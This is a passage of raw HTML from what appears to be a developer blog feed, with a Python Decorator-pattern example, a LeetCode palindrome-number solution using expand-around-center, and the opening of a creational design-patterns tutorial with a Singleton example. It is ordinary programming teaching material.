class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">beverage</span><span class="p">.</span><span class="nf">cost</span><span class="p">()</span> <span class="o">+</span> <span class="mf">0.50</span> <span class="k">def</span> <span class="nf">description</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">beverage</span><span class="p">.</span><span class="nf">description</span><span class="p">()</span> <span class="o">+</span> <span class="sh">"</span><span class="s">, Cream</span><span class="sh">"</span> <span class="k">class</span> <span class="nc">CaramelDecorator</span><span class="p">(</span><span class="n">BeverageDecorator</span><span class="p">):</span> <span class="k">def</span> <span class="nf">cost</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">beverage</span><span class="p">.</span><span class="nf">cost</span><span class="p">()</span> <span class="o">+</span> <span class="mf">0.75</span> <span class="k">def</span> <span class="nf">description</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">beverage</span><span class="p">.</span><span class="nf">description</span><span class="p">()</span> <span class="o">+</span> <span class="sh">"</span><span class="s">, Caramel</span><span class="sh">"</span> <span class="k">class</span> <span class="nc">WhippedCreamDecorator</span><span class="p">(</span><span class="n">BeverageDecorator</span><span class="p">):</span> <span class="k">def</span> <span class="nf">cost</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">beverage</span><span class="p">.</span><span class="nf">cost</span><span class="p">()</span> <span class="o">+</span> <span class="mf">0.50</span> <span class="k">def</span> <span class="nf">description</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="k">return</span> <span class="n">self</span><span class="p">.</span><span class="n">beverage</span><span class="p">.</span><span class="nf">description</span><span class="p">()</span> <span class="o">+</span> <span class="sh">"</span><span class="s">, Whipped Cream</span><span class="sh">"</span> <span class="c1"># Compose dynamically </span><span class="n">coffee</span> <span class="o">=</span> <span class="nc">Coffee</span><span class="p">()</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">coffee</span><span class="p">.</span><span class="nf">description</span><span class="p">()</span><span class="si">}</span><span class="s">: $</span><span class="si">{</span><span class="n">coffee</span><span class="p">.</span><span class="nf">cost</span><span class="p">()</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="n">coffee_with_cream</span> <span class="o">=</span> <span class="nc">CreamDecorator</span><span class="p">(</span><span class="n">coffee</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">coffee_with_cream</span><span class="p">.</span><span class="nf">description</span><span class="p">()</span><span class="si">}</span><span class="s">: $</span><span class="si">{</span><span class="n">coffee_with_cream</span><span class="p">.</span><span class="nf">cost</span><span class="p">()</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="n">fancy_coffee</span> <span class="o">=</span> <span class="nc">WhippedCreamDecorator</span><span class="p">(</span><span class="nc">CaramelDecorator</span><span class="p">(</span><span class="nc">CreamDecorator</span><span class="p">(</span><span class="nc">Coffee</span><span class="p">())))</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">fancy_coffee</span><span class="p">.</span><span class="nf">description</span><span class="p">()</span><span class="si">}</span><span class="s">: $</span><span class="si">{</span><span class="n">fancy_coffee</span><span class="p">.</span><span class="nf">cost</span><span class="p">()</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="c1"># Add any combination without new classes </span><span class="n">iced_fancy</span> <span class="o">=</span> <span class="nc">WhippedCreamDecorator</span><span class="p">(</span><span class="nc">CaramelDecorator</span><span class="p">(</span><span class="nc">Coffee</span><span class="p">()))</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">iced_fancy</span><span class="p">.</span><span class="nf">description</span><span class="p">()</span><span class="si">}</span><span class="s">: $</span><span class="si">{</span><span class="n">iced_fancy</span><span class="p">.</span><span class="nf">cost</span><span class="p">()</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> </code></pre> </div> <p><strong>Pros:</strong></p> <ul> <li>More flexible than subclassing</li> <li>Responsibilities can be added/removed at runtime</li> <li>Single Responsibility Principle</li> <li>Avoids class explosion</li> <li>Can combine decorators in any order</li> </ul> <p><strong>Cons:</strong></p> <ul> <li>Many small decorator classes</li> <li>Order of decorators can matter</li> <li>Harder to understand with multiple layers</li> <li>Debugging decorated objects can be tricky</li> </ul> <p><strong>My Take:</strong></p> <p>Decorator is one of my favorite patterns because it solves real problems in elegant ways.</p> <p>Every time I see a class hierarchy growing out of control (Coffee, CoffeeWithCream, CoffeeWithCreamAndSugar, ...), I immediately think "Decorator."</p> <p>Python's context managers, decorators (yes, they use this pattern!), and middleware all use this pattern. It's production-tested and battle-hardened.</p> <p>Use Decorator whenever you need to add behavior dynamically without modifying existing classes.</p> <h2> Comparison Table </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Pattern</th> <th>Purpose</th> <th>Complexity</th> <th>When to Use</th> </tr> </thead> <tbody> <tr> <td>Adapter</td> <td>Make incompatible interfaces work together</td> <td>Low</td> <td>Integrating third-party libraries</td> </tr> <tr> <td>Bridge</td> <td>Decouple abstraction from implementation</td> <td>Medium</td> <td>Multiple independent dimensions</td> </tr> <tr> <td>Composite</td> <td>Build tree structures uniformly</td> <td>Medium</td> <td>Hierarchical data (files, menus, DOM)</td> </tr> <tr> <td>Decorator</td> <td>Add behavior without modifying classes</td> <td>Medium</td> <td>Dynamic feature addition, avoid explosion</td> </tr> </tbody> </table></div> <h2> Part 2 Coming Next </h2> <p>In the next article, we'll cover the remaining structural patterns:</p> <ul> <li> <strong>Facade</strong> — Simplify complex subsystems</li> <li> <strong>Flyweight</strong> — Share data to save memory</li> <li> <strong>Proxy</strong> — Control access to objects</li> </ul> <p>Each with the same production-focused approach: real code, real problems, and when to actually use them.</p> <h2> What's Next in the Design Patterns Series? </h2> <ul> <li> <strong>Part 1</strong> (This Article): Adapter, Bridge, Composite, Decorator</li> <li> <strong>Part 2</strong>: Facade, Flyweight, Proxy</li> <li> <strong>Behavioral Patterns</strong> (Coming Soon): Strategy, Observer, Command, State, Template Method, Chain of Responsibility, and more</li> </ul> <h2> Want More Deep Dives? </h2> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyy04qadm9b3plp7jnnzk.webp" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyy04qadm9b3plp7jnnzk.webp" alt="Mahdi Shamlo" width="800" height="1067"></a></p> <p>If you enjoyed this article, check out my other production-focused guides:</p> <ul> <li> <a href="https://dev.to/mahdi0shamlou/design-patterns-in-programming-stop-building-spaghetti-code-2026-edition-7jd">Creational Design Patterns: Python 2026</a> — Singleton, Factory, Builder, and more</li> <li> <a href="https://dev.to/mahdi0shamlou/message-brokers-comparison-2026-kafka-rabbitmq-nats-redis-streams-which-one-should-you-3ea8">Message Brokers in 2026: Kafka, RabbitMQ, NATS</a> — Architecture decisions</li> <li> <a href="https://dev.to/mahdi0shamlou/owasp-top-10-for-developers-2026-edition-how-to-actually-fix-the-most-dangerous-web-11pi">OWASP Top 10 for Developers (2026 Edition)</a> — Security patterns</li> <li> <a href="https://dev.to/mahdi0shamlou/mahdi-shamlou-durable-workflow-engines-comparison-temporal-dbos-transact-prefect-custom-3a6a">Durable Workflow Engines: Temporal vs dbt OS vs Transact vs Prefect</a> — System patterns</li> </ul> <p>🔗 <strong>LinkedIn:</strong> <a href="https://www.linkedin.com/in/mahdi-shamlou-3b52b8278" rel="noopener noreferrer">https://www.linkedin.com/in/mahdi-shamlou-3b52b8278</a><br> 📱 <strong>Telegram:</strong> <a href="https://telegram.me/mahdi0shamlou" rel="noopener noreferrer">https://telegram.me/mahdi0shamlou</a><br> 📸 <strong>Instagram:</strong> <a href="https://www.instagram.com/mahdi0shamlou/" rel="noopener noreferrer">https://www.instagram.com/mahdi0shamlou/</a></p> <p><strong>Author: Mahdi Shamlou | مهدی شاملو</strong></p> ai webdev programming tutorial Mahdi Shamlou | Solving LeetCode #9: Palindrome Number — Step by Step Mahdi SHamlou | مهدی شاملو Thu, 11 Jun 2026 15:33:34 +0000 https://dev.to/mahdi0shamlou/mahdi-shamlou-solving-leetcode-9-palindrome-number-step-by-step-1b21 https://dev.to/mahdi0shamlou/mahdi-shamlou-solving-leetcode-9-palindrome-number-step-by-step-1b21 <p>Hey everyone! <a href="https://dev.to/mahdi0shamlou">Mahdi Shamlou</a> here — back with another LeetCode classic problem 🚀 </p> <p>After <a href="https://dev.to/mahdi0shamlou/mahdi-shamlou-solving-leetcode-8-string-to-integer-atoi-step-by-step-426a">#8 String to Integer (atoi)</a>, today I solved <strong>Problem #9 — Palindrome Number</strong>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb1jeqtaqrchs8zcdhw7p.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb1jeqtaqrchs8zcdhw7p.png" alt="Mahdi Shamlou" width="800" height="450"></a></p> <p>At first, I thought:</p> <blockquote> <p>"This should be easy... just check whether the number reads the same from left to right and right to left."</p> </blockquote> <p>But instead of reversing the number, I decided to treat it like a palindrome string problem and expand from the center.</p> <h2> Problem Statement </h2> <p>Given an integer <code>x</code>, return <code>true</code> if <code>x</code> is a palindrome, and <code>false</code> otherwise.</p> <p>A palindrome number reads the same backward as forward.</p> <h3> Examples </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Input: 121 Output: true </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Input: -121 Output: false </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Input: 10 Output: false </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Input: 1221 Output: true </code></pre> </div> <h2> My Thought Process </h2> <p>When I started, this was my idea:</p> <ol> <li>Change <code>x</code> from integer to string.</li> <li>Find the center of the string.</li> <li>Expand around the center.</li> <li>Compare characters on both sides.</li> <li>If everything matches until the edges, return <code>True</code>.</li> </ol> <p>My initial notes were literally:</p> <ul> <li>first of all i think change x from int to str</li> <li>secend i think i can find center of str and expand around the center with consider odd or even x_str</li> <li>three if any one of them is not equal we can return False else return True</li> </ul> <p>So that's exactly the approach I implemented.</p> <h2> My Solution </h2> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">class</span> <span class="nc">Solution</span><span class="p">:</span> <span class="k">def</span> <span class="nf">isPalindrome</span><span class="p">(</span><span class="n">self</span><span class="p">,</span> <span class="n">x</span><span class="p">:</span> <span class="nb">int</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">bool</span><span class="p">:</span> <span class="sh">"""</span><span class="s"> first of all i think change x from int to str secend i think i can find center of str and expand around the center with consider odd or even x_str three if any one of them is not equal we can return False else return True </span><span class="sh">"""</span> <span class="n">x_str</span> <span class="o">=</span> <span class="nf">str</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="n">x_is_palindrome</span> <span class="o">=</span> <span class="bp">False</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">x : </span><span class="si">{</span><span class="n">x_str</span><span class="si">}</span><span class="s"> and type : </span><span class="si">{</span><span class="nf">type</span><span class="p">(</span><span class="n">x_str</span><span class="p">)</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="k">if</span> <span class="nf">len</span><span class="p">(</span><span class="n">x_str</span><span class="p">)</span> <span class="o">%</span> <span class="mi">2</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">x is even and len is : </span><span class="si">{</span><span class="nf">len</span><span class="p">(</span><span class="n">x_str</span><span class="p">)</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="n">mid_of_str_num</span> <span class="o">=</span> <span class="nf">len</span><span class="p">(</span><span class="n">x_str</span><span class="p">)</span> <span class="o">/</span> <span class="mi">2</span> <span class="n">left</span> <span class="o">=</span> <span class="n">mid_of_str_num</span> <span class="o">-</span> <span class="mi">1</span> <span class="n">right</span> <span class="o">=</span> <span class="n">mid_of_str_num</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">left for start is : </span><span class="si">{</span><span class="n">left</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">right for start is : </span><span class="si">{</span><span class="n">right</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="k">while</span> <span class="n">left</span> <span class="o">&gt;=</span> <span class="mi">0</span> <span class="ow">and</span> <span class="n">right</span> <span class="o">&lt;</span> <span class="nf">len</span><span class="p">(</span><span class="n">x_str</span><span class="p">)</span> <span class="ow">and</span> <span class="n">x_str</span><span class="p">[</span><span class="nf">int</span><span class="p">(</span><span class="n">left</span><span class="p">)]</span> <span class="o">==</span> <span class="n">x_str</span><span class="p">[</span><span class="nf">int</span><span class="p">(</span><span class="n">right</span><span class="p">)]:</span> <span class="n">left</span> <span class="o">-=</span> <span class="mi">1</span> <span class="n">right</span> <span class="o">+=</span> <span class="mi">1</span> <span class="n">left</span> <span class="o">=</span> <span class="n">left</span> <span class="o">+</span> <span class="mi">1</span> <span class="n">right</span> <span class="o">=</span> <span class="n">right</span> <span class="o">-</span> <span class="mi">1</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">left in end is : </span><span class="si">{</span><span class="n">left</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">right in end is : </span><span class="si">{</span><span class="n">right</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="nf">return </span><span class="p">(</span><span class="n">left</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="ow">and</span> <span class="p">(</span><span class="n">right</span> <span class="o">==</span> <span class="nf">len</span><span class="p">(</span><span class="n">x_str</span><span class="p">)</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="k">else</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">x is odd and len is : </span><span class="si">{</span><span class="nf">len</span><span class="p">(</span><span class="n">x_str</span><span class="p">)</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="n">mid_of_str_num</span> <span class="o">=</span> <span class="nf">int</span><span class="p">(</span><span class="nf">len</span><span class="p">(</span><span class="n">x_str</span><span class="p">)</span> <span class="o">/</span> <span class="mi">2</span><span class="p">)</span> <span class="n">left</span> <span class="o">=</span> <span class="n">mid_of_str_num</span> <span class="n">right</span> <span class="o">=</span> <span class="n">mid_of_str_num</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">left for start is : </span><span class="si">{</span><span class="n">left</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">right for start is : </span><span class="si">{</span><span class="n">right</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="k">while</span> <span class="n">left</span> <span class="o">&gt;=</span> <span class="mi">0</span> <span class="ow">and</span> <span class="n">right</span> <span class="o">&lt;</span> <span class="nf">len</span><span class="p">(</span><span class="n">x_str</span><span class="p">)</span> <span class="ow">and</span> <span class="n">x_str</span><span class="p">[</span><span class="nf">int</span><span class="p">(</span><span class="n">left</span><span class="p">)]</span> <span class="o">==</span> <span class="n">x_str</span><span class="p">[</span><span class="nf">int</span><span class="p">(</span><span class="n">right</span><span class="p">)]:</span> <span class="n">left</span> <span class="o">-=</span> <span class="mi">1</span> <span class="n">right</span> <span class="o">+=</span> <span class="mi">1</span> <span class="n">left</span> <span class="o">=</span> <span class="n">left</span> <span class="o">+</span> <span class="mi">1</span> <span class="n">right</span> <span class="o">=</span> <span class="n">right</span> <span class="o">-</span> <span class="mi">1</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">left in end is : </span><span class="si">{</span><span class="n">left</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">right in end is : </span><span class="si">{</span><span class="n">right</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="nf">return </span><span class="p">(</span><span class="n">left</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="ow">and</span> <span class="p">(</span><span class="n">right</span> <span class="o">==</span> <span class="nf">len</span><span class="p">(</span><span class="n">x_str</span><span class="p">)</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="k">return</span> <span class="bp">False</span> <span class="n">x</span> <span class="o">=</span> <span class="nc">Solution</span><span class="p">()</span> <span class="n">res</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="nf">isPalindrome</span><span class="p">(</span><span class="n">x</span><span class="o">=</span><span class="mi">121</span><span class="p">)</span> <span class="nf">print</span><span class="p">(</span><span class="n">res</span><span class="p">)</span> </code></pre> </div> <h2> How It Works </h2> <h3> For Odd Length Numbers </h3> <p>Example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>121 </code></pre> </div> <p>The center is:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> 2 </code></pre> </div> <p>Start with:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>left = center right = center </code></pre> </div> <p>Then expand outward:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>1 2 1 ^ ^ </code></pre> </div> <p>If both sides keep matching until we reach the edges, the number is a palindrome.</p> <h3> For Even Length Numbers </h3> <p>Example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>1221 </code></pre> </div> <p>There is no single center.</p> <p>Instead we start from:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>12|21 ^ </code></pre> </div> <p>and compare:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>1 2 2 1 ^ ^ </code></pre> </div> <p>Then expand:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>1 2 2 1 ^ ^ </code></pre> </div> <p>If every comparison matches, we return <code>True</code>.</p> <h2> What I Learned </h2> <p>This problem reminded me of a common pattern:</p> <p><strong>Expand Around Center</strong></p> <p>I usually think about this technique for string palindrome problems, but it also works nicely here after converting the integer into a string.</p> <p>Another thing I noticed is that handling odd-length and even-length cases separately makes the logic easier to understand.</p> <h2> Complexity Analysis </h2> <h3> Time Complexity </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>O(n) </code></pre> </div> <p>We may visit each character once while expanding from the center.</p> <h3> Space Complexity </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>O(n) </code></pre> </div> <p>Because we convert the integer into a string.</p> <h2> Final Thoughts </h2> <p>This problem wasn't really about a complicated algorithm.</p> <p>For me, it was about taking a familiar palindrome technique and applying it to numbers.</p> <p>I know there are other solutions that avoid converting to a string, but I wanted to solve it using the first idea that came to my mind and make it work correctly.</p> <p>And that's one thing I enjoy about LeetCode:</p> <blockquote> <p>Sometimes the best solution is not the first accepted solution. But every accepted solution teaches you something.</p> </blockquote> <h2> What About You? </h2> <p>Did you solve this problem using:</p> <ul> <li>String conversion?</li> <li>Reversing the integer?</li> <li>Two pointers?</li> <li>Another approach?</li> </ul> <p>Drop your thoughts — I read everything! 🚀</p> <h3> My Repo (All Solutions) </h3> <p>GitHub — <a href="https://github.com/mahdi0shamlou" rel="noopener noreferrer">mahdi0shamlou/LeetCode</a></p> <h2> Want More? </h2> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffl1e7jvx8oxzwbgeq3s5.webp" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffl1e7jvx8oxzwbgeq3s5.webp" alt="Mahdi Shamlou" width="800" height="1067"></a></p> <p>If you enjoyed this deep dive, check out my other articles:</p> <ul> <li> <a href="https://dev.to/mahdi0shamlou/design-patterns-in-programming-stop-building-spaghetti-code-2026-edition-7jd">Design Patterns in Programming: Stop Building Spaghetti Code (2026 Edition) | Mahdi Shamlou </a> — Design Patterns</li> <li> <a href="https://dev.to/mahdi0shamlou/message-brokers-comparison-2026-kafka-rabbitmq-nats-redis-streams-which-one-should-you-3ea8">Message Brokers in 2026: Kafka, RabbitMQ, NATS — Which One Should You Really Use</a> — Architecture decisions</li> <li> <a href="https://dev.to/mahdi0shamlou/owasp-top-10-for-developers-2026-edition-how-to-actually-fix-the-most-dangerous-web-11pi">OWASP Top 10 for Developers (2026 Edition) — How to Actually Fix the Most Dangerous Web Vulnerabilities</a> — Security patterns</li> <li> <a href="https://dev.to/mahdi0shamlou/injection-attacks-are-not-dead-sql-nosql-orm-and-command-injection-how-to-actually-fix-them-f89">Injection Attacks Are Not Dead: SQL, NoSQL, ORM, and Command Injection — How to Actually Fix Them</a> — Attack patterns</li> <li> <a href="https://dev.to/mahdi0shamlou/mahdi-shamlou-durable-workflow-engines-comparison-temporal-dbos-transact-prefect-custom-3a6a">Durable Workflow Engines: Temporal vs dbt OS vs Transact vs Prefect</a> — System patterns</li> </ul> <p>🔗 <strong>LinkedIn:</strong> <a href="https://www.linkedin.com/in/mahdi-shamlou-3b52b8278" rel="noopener noreferrer">https://www.linkedin.com/in/mahdi-shamlou-3b52b8278</a><br> 📱 <strong>Telegram:</strong> <a href="https://telegram.me/mahdi0shamlou" rel="noopener noreferrer">https://telegram.me/mahdi0shamlou</a><br> 📸 <strong>Instagram:</strong> <a href="https://www.instagram.com/mahdi0shamlou/" rel="noopener noreferrer">https://www.instagram.com/mahdi0shamlou/</a></p> <p><strong>Author: Mahdi Shamlou | مهدی شاملو</strong></p> leetcode tutorial python programming Design Patterns in Programming: Stop Building Spaghetti Code (2026 Edition - Creational Patterns) | Mahdi Shamlou Mahdi SHamlou | مهدی شاملو Thu, 11 Jun 2026 14:40:56 +0000 https://dev.to/mahdi0shamlou/design-patterns-in-programming-stop-building-spaghetti-code-2026-edition-7jd https://dev.to/mahdi0shamlou/design-patterns-in-programming-stop-building-spaghetti-code-2026-edition-7jd <p><a href="https://dev.to/mahdi0shamlou">Mahdi Shamlou</a> here.</p> <p>If you've read my <a href="https://dev.to/mahdi0shamlou/owasp-top-10-for-developers-2026-edition-how-to-actually-fix-the-most-dangerous-web-11pi">OWASP Top 10</a> or <a href="https://dev.to/mahdi0shamlou/mahdi-shamlou-durable-workflow-engines-comparison-temporal-dbos-transact-prefect-custom-3a6a">durable workflow engines</a> articles, you know I care about writing code that actually works in production. If you've seen my <a href="https://dev.to/mahdi0shamlou/message-brokers-comparison-2026-kafka-rabbitmq-nats-redis-streams-which-one-should-you-3ea8">message broker comparison</a>, you know I think deeply about system architecture.</p> <p>Today, we're tackling something that separates junior developers from senior ones:</p> <blockquote> <p><strong>Which design patterns should you actually use in 2026?</strong></p> </blockquote> <p>I've seen countless codebases where developers either:</p> <ul> <li>Don't use any patterns (chaos)</li> <li>Overuse patterns everywhere (over-engineered nightmare)</li> <li>Use patterns they don't understand (copy-paste disaster)</li> <li>Pick the wrong pattern for the job (wrong tool, right hand)</li> </ul> <p>Most tutorials teach patterns in a vacuum. They don't tell you <strong>when</strong>, <strong>where</strong>, and <strong>why</strong> to use them.</p> <p>So I decided to write a practical guide that shows you the design patterns that matter, with real Python code you can use today.</p> <p>Let's dive in.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4avyshd5ld28gvrbeu1g.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4avyshd5ld28gvrbeu1g.png" alt="Mahdi Shamlou" width="800" height="450"></a></p> <h2> What Are Design Patterns? </h2> <p>A design pattern is a reusable solution to a common programming problem.</p> <p>Instead of reinventing the wheel every time, you use a proven blueprint that other developers have tested in real systems.</p> <p>Think of them like recipes:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Instead of figuring out how to make pasta: You follow a pattern (boil water → add salt → cook pasta → drain) </code></pre> </div> <p>Design patterns help you:</p> <ul> <li>Write cleaner code</li> <li>Make systems easier to maintain</li> <li>Avoid common mistakes</li> <li>Communicate with other developers</li> <li>Build scalable systems</li> </ul> <p>The most practical patterns fall into three groups:</p> <ol> <li> <strong>Creational</strong> — How to create objects</li> <li> <strong>Structural</strong> — How to organize relationships between objects</li> <li> <strong>Behavioral</strong> — How objects interact and communicate</li> </ol> <h2> Creational Patterns (That Actually Matter) </h2> <h3> 1. Singleton Pattern </h3> <p>The Singleton pattern ensures only one instance of a class exists.</p> <p><strong>When to use it:</strong></p> <ul> <li>Database connections</li> <li>Configuration managers</li> <li>Logging systems</li> <li>Cache managers</li> </ul> <p><strong>Bad code (without pattern):</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># Every time you call this, you get a new instance </span><span class="k">class</span> <span class="nc">DatabaseConnection</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">connection</span> <span class="o">=</span> <span class="nf">connect_to_db</span><span class="p">()</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">New connection created</span><span class="sh">"</span><span class="p">)</span> <span class="n">db1</span> <span class="o">=</span> <span class="nc">DatabaseConnection</span><span class="p">()</span> <span class="c1"># "New connection created" </span><span class="n">db2</span> <span class="o">=</span> <span class="nc">DatabaseConnection</span><span class="p">()</span> <span class="c1"># "New connection created" again! # Now you have 2 connections (bad!) </span></code></pre> </div> <p><strong>Good code (with Singleton):</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="k">class</span> <span class="nc">Singleton</span><span class="p">(</span><span class="nb">type</span><span class="p">):</span> <span class="n">_instances</span> <span class="o">=</span> <span class="p">{}</span> <span class="k">def</span> <span class="nf">__call__</span><span class="p">(</span><span class="n">cls</span><span class="p">,</span> <span class="o">*</span><span class="n">args</span><span class="p">,</span> <span class="o">**</span><span class="n">kwargs</span><span class="p">):</span> <span class="k">if</span> <span class="n">cls</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">cls</span><span class="p">.</span><span class="n">_instances</span><span class="p">:</span> <span class="n">cls</span><span class="p">.</span><span class="n">_instances</span><span class="p">[</span><span class="n">cls</span><span class="p">]</span> <span class="o">=</span> <span class="nf">super</span><span class="p">().</span><span class="nf">__call__</span><span class="p">(</span><span class="o">*</span><span class="n">args</span><span class="p">,</span> <span class="o">**</span><span class="n">kwargs</span><span class="p">)</span> <span class="k">return</span> <span class="n">cls</span><span class="p">.</span><span class="n">_instances</span><span class="p">[</span><span class="n">cls</span><span class="p">]</span> <span class="k">class</span> <span class="nc">DatabaseConnection</span><span class="p">(</span><span class="n">metaclass</span><span class="o">=</span><span class="n">Singleton</span><span class="p">):</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="n">self</span><span class="p">):</span> <span class="n">self</span><span class="p">.</span><span class="n">connection</span> <span class="o">=</span> <span class="nf">connect_to_db</span><span class="p">()</span> <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Connection created once</span><span class="sh">"</span><span class="p">)</span> <span class="n">db1</span> <span class="o">=</span> <span class="nc">DatabaseConnection</span><span class="p">()</span> <span class="c1"># "Connection created once" </span><span class="n">db2</span> <span class="o">=</span> <span class="nc">DatabaseConnection</span><span class="p">()</span> <span class="c1"># Reuses same instance, nothing printed </span><span class="nf">print</span><span class="p">(</span><span class="n">db1</span> <span class="ow">is</span> <span class="n">db2</span><span class="p">)</span> <span class="c1"># True - same object </span></code></pre> </div> <p><strong>Pros:</strong></p> <ul> <li>Only one instance in memory</li> <li>Thread-safe when done right</li> <li>Good for shared resources</li> </ul> <p><strong>Cons:</strong></p> <ul> <li>Can make testing harder</li> <li>Global state (use carefully)</li> <li>Can hide dependencies</li> </ul> <h3> 2. Factory Pattern </h3> 